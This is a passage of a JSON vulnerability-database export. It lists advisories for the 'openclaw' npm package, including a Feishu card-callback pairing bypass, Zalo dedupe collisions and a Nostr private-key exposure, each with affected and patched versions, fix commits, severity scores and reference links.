-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35668","GHSA-hr5v-j9h9-xjhg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d3qp-5wm9-aqfp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90876?format=json","vulnerability_id":"VCID-d864-qy75-c3dx","summary":"OpenClaw: Feishu Raw Card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing\n## Summary\n\nFeishu Raw card Send Surface Can Mint Legacy Card Callbacks That Bypass DM Pairing\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nFeishu raw card sends could previously mint legacy callback payloads that bypassed DM pairing and let unpaired recipients reach callback handling. Commit `81c45976db532324b5a0918a70decc19520dc354` rejects legacy raw-card command payloads so callbacks stay on the normal paired path.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81c45976db532324b5a0918a70decc19520dc354`.\n\n## Fix Commit(s)\n\n- `81c45976db532324b5a0918a70decc19520dc354`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35664","reference_id":"","reference_type":"","scores":[{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.27048","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.27001","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00098","scoring_system":"epss","scoring_elements":"0.2704","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35664"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/81c45976db532324b5a0918a70decc19520dc354","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/"}],"url":"https://github.com/openclaw/openclaw/commit/81c45976db532324b5a0918a70decc19520dc354"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-77w2-crqv-cmv3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-77w2-crqv-cmv3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35664","reference_id":"CVE-2026-35664","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35664"},{"reference_url":"https://github.com/advisories/GHSA-77w2-crqv-cmv3","reference_id":"GHSA-77w2-crqv-cmv3","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-77w2-crqv-cmv3"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-dm-pairing-bypass-via-legacy-card-callbacks","reference_id":"openclaw-dm-pairing-bypass-via-legacy-card-callbacks","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:57:40Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-dm-pairing-bypass-via-legacy-card-callbacks"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35664","GHSA-77w2-crqv-cmv3"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d864-qy75-c3dx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89306?format=json","vulnerability_id":"VCID-d8v2-gft5-buee","summary":"OpenClaw: Zalo replay dedupe keys could suppress messages across chats or senders\n## Summary\n\nBefore OpenClaw 2026.4.2, Zalo webhook replay dedupe keys were not scoped strongly enough across chat and sender dimensions. Legitimate events from different conversations or senders could collide and be dropped as duplicates.\n\n## Impact\n\nCross-conversation or cross-sender collisions could cause silent message suppression and break bot workflows. This was an availability issue in webhook event processing.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `ef7c553dd16ee579f1d1a363f5881a99726c1412` — scope Zalo webhook replay dedupe across the missing event dimensions\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @D0ub1e-D for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41354","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.1772","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17683","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17714","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41354"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ef7c553dd16ee579f1d1a363f5881a99726c1412","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ef7c553dd16ee579f1d1a363f5881a99726c1412"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rxmx-g7hr-8mx4","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rxmx-g7hr-8mx4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41354","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41354"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-insufficient-scope-in-zalo-webhook-replay-dedupe-keys","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-insufficient-scope-in-zalo-webhook-replay-dedupe-keys"},{"reference_url":"https://github.com/advisories/GHSA-rxmx-g7hr-8mx4","reference_id":"GHSA-rxmx-g7hr-8mx4","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rxmx-g7hr-8mx4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41354","GHSA-rxmx-g7hr-8mx4"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d8v2-gft5-buee"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89082?format=json","vulnerability_id":"VCID-da47-zdf1-mfgf","summary":"## Summary\nOpenClaw Nostr privateKey config redaction bypass leaks plaintext signing key via config.get\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still models Nostr privateKey as plain string so config views can expose it, and the secret-schema fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `57700d716f660591fb6e09727f3ca8041fa48b9d` — 2026-03-31T19:55:03+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @ccreater222 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41385","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03912","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03897","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.0391","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41385"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/57700d716f660591fb6e09727f3ca8041fa48b9d","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/57700d716f660591fb6e09727f3ca8041fa48b9d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":"